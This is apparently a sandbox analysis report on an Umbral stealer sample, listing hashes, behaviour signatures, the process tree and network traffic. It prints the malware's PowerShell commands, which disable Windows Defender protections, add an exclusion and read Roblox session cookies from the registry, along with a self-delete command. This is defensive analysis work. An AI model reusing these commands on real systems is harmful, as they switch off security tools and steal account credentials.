Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    22-08-2024 02:01

General

  • Target

    0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe

  • Size

    227KB

  • MD5

    fe415b65db443f8d7e3aa075d79b4a72

  • SHA1

    71fa4604b053ac55c7afa5a2d87ea0bcf8d0a116

  • SHA256

    0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0

  • SHA512

    dc715d2c938f22446f155afa615adbee775eb7abdc688b204037eccadd435490be3ab0fe6b2a9d493cb357de5730e864ffb842c42dc3051671a7fbc9a9117fb8

  • SSDEEP

    6144:+loZM9rIkd8g+EtXHkv/iD4W9YhFzQEbmCzFQMpi+b8e1mSPi:ooZOL+EP8W9YhFzQEbmCzFQMp9Pa

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
    "C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe"
      2⤵
      • Views/modifies file attributes
      PID:2740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2856
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1184
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1672
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:1920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2848
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:852
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe" && pause
        2⤵
        • Deletes itself
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2928
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3040

    Network

    • flag-us
      DNS
      gstatic.com
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      Remote address:
      8.8.8.8:53
      Request
      gstatic.com
      IN A
      Response
      gstatic.com
      IN A
      216.58.214.67
    • flag-fr
      GET
      https://gstatic.com/generate_204
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      Remote address:
      216.58.214.67:443
      Request
      GET /generate_204 HTTP/1.1
      Host: gstatic.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Content-Length: 0
      Cross-Origin-Resource-Policy: cross-origin
      Date: Thu, 22 Aug 2024 02:01:12 GMT
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      ip-api.com
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/?fields=225545
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 22 Aug 2024 02:01:14 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 161
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      DNS
      discord.com
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      Remote address:
      8.8.8.8:53
      Request
      discord.com
      IN A
      Response
      discord.com
      IN A
      162.159.128.233
      discord.com
      IN A
      162.159.136.232
      discord.com
      IN A
      162.159.135.232
      discord.com
      IN A
      162.159.138.232
      discord.com
      IN A
      162.159.137.232
    • 216.58.214.67:443
      https://gstatic.com/generate_204
      tls, http
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      862 B
      4.7kB
      11
      8

      HTTP Request

      GET https://gstatic.com/generate_204

      HTTP Response

      204
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=225545
      http
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      309 B
      510 B
      5
      4

      HTTP Request

      GET http://ip-api.com/json/?fields=225545

      HTTP Response

      200
    • 162.159.128.233:443
      discord.com
      tls
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      345 B
      219 B
      5
      5
    • 8.8.8.8:53
      gstatic.com
      dns
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      57 B
      73 B
      1
      1

      DNS Request

      gstatic.com

      DNS Response

      216.58.214.67

    • 8.8.8.8:53
      ip-api.com
      dns
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      discord.com
      dns
      0bb64c9c095b99117d8250f97cda9a257985ce3ba6b5891796c7ece426b61ed0.exe
      57 B
      137 B
      1
      1

      DNS Request

      discord.com

      DNS Response

      162.159.128.233
      162.159.136.232
      162.159.135.232
      162.159.138.232
      162.159.137.232

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      a46df4d585e57a4ffe9b49434689754e

      SHA1

      5e894d21610605ec909cc9dc4b82de89ec673228

      SHA256

      333b13d1466ebfb8e4a4806052ebe2b5aab1c6f2c7f31f7373c329c008efae9c

      SHA512

      aff2c4d56fcd124ff6c2381cfbde9d4ddb00ae4d447eca844c8049945a21634960981b9c4068de202e5c2c342748f7c9b65566c1f928fcd16c418370480b0224

    • memory/2200-8-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

      Filesize

      2.9MB

    • memory/2200-11-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-7-0x000007FEED8FE000-0x000007FEED8FF000-memory.dmp

      Filesize

      4KB

    • memory/2200-15-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-13-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-10-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-14-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-12-0x000007FEED640000-0x000007FEEDFDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2200-9-0x0000000001E70000-0x0000000001E78000-memory.dmp

      Filesize

      32KB

    • memory/2568-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2568-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

      Filesize

      32KB

    • memory/2664-2-0x000007FEF5D20000-0x000007FEF670C000-memory.dmp

      Filesize

      9.9MB

    • memory/2664-0-0x000007FEF5D23000-0x000007FEF5D24000-memory.dmp

      Filesize

      4KB

    • memory/2664-1-0x0000000000DC0000-0x0000000000E00000-memory.dmp

      Filesize

      256KB

    • memory/2664-53-0x000007FEF5D20000-0x000007FEF670C000-memory.dmp

      Filesize

      9.9MB

    • memory/2848-49-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

      Filesize

      2.9MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.